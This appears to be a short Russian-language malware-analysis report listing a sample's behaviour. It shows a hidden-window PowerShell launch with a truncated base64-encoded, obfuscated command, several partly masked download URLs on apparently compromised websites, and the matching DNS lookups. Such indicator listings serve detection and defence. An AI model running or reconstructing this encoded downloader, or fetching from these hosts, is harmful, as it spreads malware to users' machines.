Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAFIAQgBGAEcAYQBtAG0APQAnAE8ARABNAEsAWQBzAHcAYgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwB1AHIAYABJAGAAVABZAFAAYABSAG8AdABPAGAAQwBPAEwAIgAgAD...
- http://kr#####urtransfer.com/QStk/
- http://le######riephotography.com/wp-admin/wQA0hhqk1b394/
- http://www.le######riephotography.com/wp-admin/wQA0hhqk1b394/
- http://le####utdoor.com.br/Check-In/BRea/
- http://vi###balk.nl/img/Jinppxzg5770518/
- http://us###urda.net/wp-admin/tWJxGQin/
- DNS ASK kr#####urtransfer.com
- DNS ASK le######riephotography.com
- DNS ASK le####utdoor.com.br
- DNS ASK vi###balk.nl
- DNS ASK us###urda.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAFIAQgBGAEcAYQBtAG0APQAnAE8ARABNAEsAWQBzAHcAYgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwB1AHIAYABJAGAAVABZAFAAYABSAG8AdABPAGAAQwBPAEwAIgAgAD...' (со скрытым окном)